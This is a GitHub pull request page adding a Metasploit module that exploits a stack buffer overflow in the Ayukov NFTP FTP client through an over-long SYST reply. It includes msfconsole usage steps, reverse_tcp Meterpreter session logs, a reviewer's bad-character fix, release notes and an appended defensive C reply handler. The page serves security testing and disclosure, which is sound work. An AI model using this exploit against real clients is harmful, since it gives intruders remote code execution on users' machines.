
Ayukov NFTP FTP Client < 2.0 Remote Buffer Overflow #9360

Merged
merged 5 commits into from Jan 4, 2018

Conversation


@DanielRTeixeira DanielRTeixeira commented Dec 31, 2017

This PR adds a module to exploit a remote buffer overflow in the Ayukov NFTP FTP Client.

Tested on: Windows XP Professional SP3 EN x86

Verification

List the steps needed to make sure this thing works

  • Install the application
  • Start msfconsole
  • use exploit/windows/ftp/ayukov_nftp
  • Set the payload
  • Exploit
  • Connect to the FTP server using the NFTP FTP client
  • Get a session

Example

msf > use exploit/windows/ftp/ayukov_nftp
msf exploit(windows/ftp/ayukov_nftp) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/ftp/ayukov_nftp) > set LHOST 192.168.216.5 
LHOST => 192.168.216.5
msf exploit(windows/ftp/ayukov_nftp) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.216.5:4444 
msf exploit(windows/ftp/ayukov_nftp) > [*] Server started.
[*] Sending stage (179779 bytes) to 192.168.216.156
[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.156:1046) at 2017-12-31 10:05:50 -0500

@wchen-r7 wchen-r7 self-assigned this Jan 3, 2018

wchen-r7 commented Jan 3, 2018

I am not getting a session from the exploit. It looks like there is something wrong with the payload... looking into it.


wchen-r7 commented Jan 4, 2018

This time testing from a different network works:

msf exploit(windows/ftp/ayukov_nftp) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.12:4444 
[*] Server started.
msf exploit(windows/ftp/ayukov_nftp) > [*] Sending stage (179779 bytes) to 192.168.0.15
[*] Meterpreter session 1 opened (192.168.0.12:4444 -> 192.168.0.15:1126) at 2018-01-03 19:53:13 -0600


wchen-r7 commented Jan 4, 2018

Trying out a different network still works for me. Well, that was spooky:

msf exploit(windows/ftp/ayukov_nftp) > run
[*] Exploit running as background job 1.

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Server started.
msf exploit(windows/ftp/ayukov_nftp) > [*] Sending stage (179779 bytes) to 172.16.249.204
[*] Meterpreter session 2 opened (172.16.249.1:4444 -> 172.16.249.204:1146) at 2018-01-03 19:55:58 -0600


wchen-r7 commented Jan 4, 2018

I think I figured out why I was seeing that problem. You might have a bad char somewhere. I'll try to find it.


wchen-r7 commented Jan 4, 2018

OK, I think I've fixed it. Turns out you are missing a 0x0d as a bad character. Now it's working:

msf exploit(windows/ftp/ayukov_nftp) > [*] 172.16.249.204 - connected
[*] 172.16.249.204 - sending 331 OK
[*] 172.16.249.204 - sending 230 OK
[*] 172.16.249.204 - sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.249.204
[*] Meterpreter session 7 opened (172.16.249.1:4444 -> 172.16.249.204:1181) at 2018-01-03 20:45:22 -0600

I'll be landing this now. Thanks @DanielRTeixeira

@wchen-r7 wchen-r7 merged commit 3af27a0 into rapid7:master Jan 4, 2018

wchen-r7 commented Jan 4, 2018

Release Notes

This module exploits a buffer overflow vulnerability against Ayukov NFTP FTP Client. By responding to the SYST request with a long string of data, a malicious server may cause a stack buffer overflow condition on the client, resulting in arbitrary remote code execution.
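The release notes describe the bug class: a client copies a server-controlled SYST reply into a fixed-size stack buffer without checking its length. As an added example, not code from this PR, the Metasploit module, or the NFTP client, the C below shows the defensive shape of a reply handler that bounds the line before copying it. The buffer size SYST_BUF_LEN, the line cap MAX_REPLY_LINE, and the function names are assumptions chosen for illustration; the over-long 215 reply used as input is constructed inline.

```c
/* Added example (not the NFTP client's code): a bounded FTP reply handler.
 * It refuses any reply that would not fit, so nothing is ever written past
 * the end of the destination buffer. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define SYST_BUF_LEN   64   /* assumed size of the client's fixed buffer */
#define MAX_REPLY_LINE 512  /* assumed cap on any control-channel reply line */

enum reply_status { REPLY_OK = 0, REPLY_MALFORMED = 1, REPLY_TOO_LONG = 2 };

/* Parse a single-line "NNN text\r\n" reply. On success the text is stored in
 * out (always NUL-terminated) and the 3-digit code in *code. A reply longer
 * than MAX_REPLY_LINE, or whose text would not fit in out, is rejected rather
 * than copied. Multi-line replies ("NNN-text") are treated as malformed here. */
enum reply_status handle_syst_reply(const char *reply, char *out, size_t outlen, int *code)
{
    size_t len = 0;
    /* Bounded scan: stop counting once the line is clearly too long. */
    while (len <= MAX_REPLY_LINE && reply[len] != '\0')
        len++;
    if (len > MAX_REPLY_LINE)
        return REPLY_TOO_LONG;

    if (len < 4 || !isdigit((unsigned char)reply[0]) ||
        !isdigit((unsigned char)reply[1]) || !isdigit((unsigned char)reply[2]) ||
        reply[3] != ' ')
        return REPLY_MALFORMED;

    *code = (reply[0] - '0') * 100 + (reply[1] - '0') * 10 + (reply[2] - '0');

    const char *text = reply + 4;
    size_t tlen = strcspn(text, "\r\n");  /* text ends at the line terminator */
    if (outlen == 0 || tlen >= outlen)
        return REPLY_TOO_LONG;             /* would not fit: refuse, do not overflow */

    memcpy(out, text, tlen);
    out[tlen] = '\0';
    return REPLY_OK;
}

/* Constructed test input: a 215 reply whose text is text_len bytes of 'A',
 * the shape of over-long response the release notes describe. Caller frees. */
char *make_long_syst_reply(size_t text_len)
{
    char *buf = malloc(4 + text_len + 3);
    if (!buf)
        return NULL;
    memcpy(buf, "215 ", 4);
    memset(buf + 4, 'A', text_len);
    memcpy(buf + 4 + text_len, "\r\n", 3);  /* includes the NUL terminator */
    return buf;
}

int main(void)
{
    char sys[SYST_BUF_LEN];
    int code = 0;

    enum reply_status st = handle_syst_reply("215 UNIX Type: L8\r\n", sys, sizeof sys, &code);
    printf("normal reply: status %d, code %d, text \"%s\"\n", st, code, sys);

    char *evil = make_long_syst_reply(300);
    st = handle_syst_reply(evil, sys, sizeof sys, &code);
    printf("300-byte SYST text: status %d (2 = rejected as too long)\n", st);
    free(evil);
    return 0;
}
```

The check that matters is `tlen >= outlen`: the handler measures the server-supplied text against the destination size and rejects the reply outright instead of copying and hoping. Rejecting (rather than silently truncating) also makes the condition visible to logging, which is what a client-side detection would key on.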
